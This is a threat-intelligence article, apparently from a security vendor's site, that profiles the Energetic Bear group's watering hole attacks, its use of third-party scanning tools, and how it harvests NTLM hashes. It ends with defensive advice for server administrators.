Energetic Bear
The Energetic Bear is a threat actor that hijacks insufficiently-secured servers for exploiting as resources and launching attacks that may collect information or establish backdoor control. Its targets include a variety of industries and nations throughout the world, although the energy sector is of particular interest in its 'watering hole' attacks. Users can prevent attacks by monitoring their browser and server security protocols, and by having anti-malware products for blocking drive-by-downloads and disinfected PCs.
Predators Energized by Others' Tools
Customized Trojans are the workhorses of many an espionage campaign, but there also is more than a little to be said for using third-party software. Instead of 'living off the land' with default Windows applications, or designing custom Trojans, the Energetic Bear is a threat actor that uses a range of third-party utilities. Its attacks are no less potent, however, for the abusing of others' tools for corrupted purposes, and tend towards the effective delivery of backdoor Trojans for cementing long-term persistence.
Unlike most threat actors, the Energetic Bear displays few preferences in which entities it targets, and is in the business of taking over servers surreptitiously for using as resources for their additional attacks. Ukrainian tennis clubs, Turkish cosmetic manufacturers, and Russian cryptocurrency exchanges all are examples of targets that the Energetic Bear has a history of probing with third-party scanning utilities. Their successful watering hole attacks, by contrast, include victims such as Russian real estate, United Kingdom aerospace company, a Greek university and the US's industrial energy sector.
Standard tactics for the Energetic Bear attacks involve searching for 'weak' servers with tools like the Nmap network analyzer, the Sqlmap penetration tester, or the Commix vulnerability searcher, among others. If they gain access to the server, they use it for hosting their tools or insert corrupted code for compromising the site's traffic – depending on previously-established resources. Typically, malware analysts find the Energetic Bear's attacks inserting randomly-named PNG requests into server code, which sends traffic on a wild goose chase for an unhosted image file. This request lets the Energetic Bear harvest the user name, the domain name, the IP address and an NTLM hash of their password.
Cutting Off the Energy Source of a Server Carnivore
While the bear that's the Energetic Bear's namesake is an omnivore, this threat actor could be called a 'server-vore,' due to its preference for taking over servers near-indiscriminately, and for multiple purposes. However, malware experts do narrow down some of the Energetic Bear activities to ones that suggest that backdoor establishment is a priority. These hackers use remote admin scripts for controlling PCs, as well as a Web shell that can manage system settings and file operations.
The Energetic Bear's strategies are likely indicative of avoidance of attribution and identification by the cyber-security industry. Customized or rarely-deployed Trojans are telltale signs of various threat actors, such as APT32 or OceanLotus. Third-party tools like Dirsearch, or Wpscan, are suitable for the needs of many hackers' organizations, including state-sponsored and independent ones. However, most infections originating from the Energetic Bear require some negligence from the server's administration or other users.
Server admins can scan their code with appropriate utilities for identifying corrupted code and references to Black Hat domains. They also should avoid using brute-forcible passwords, leaving ports open, or enabling RDP too loosely. Traditional anti-malware services with browser-protecting features can block attempted infections when Web surfers load the Energetic Bear's watering hole sites, and disinfect computers, as per usual.
Putting the bulk of programming work onto another person, even an innocent one, is an easy way of getting access to invasive tools at a low, personal cost. The Energetic Bear team is nonetheless a predator at the top of its server-eating food-chain for its dependencies on strangers.
Leave a Reply
Please note that we are not able to assist with billing and support issues regarding SpyHunter or other products. If you're having issues with SpyHunter, please get in touch with SpyHunter customer support through your SpyHunter . If you have SpyHunter billing questions, we recommend you check the Billing FAQ. For general suggestions or feedback, contact us.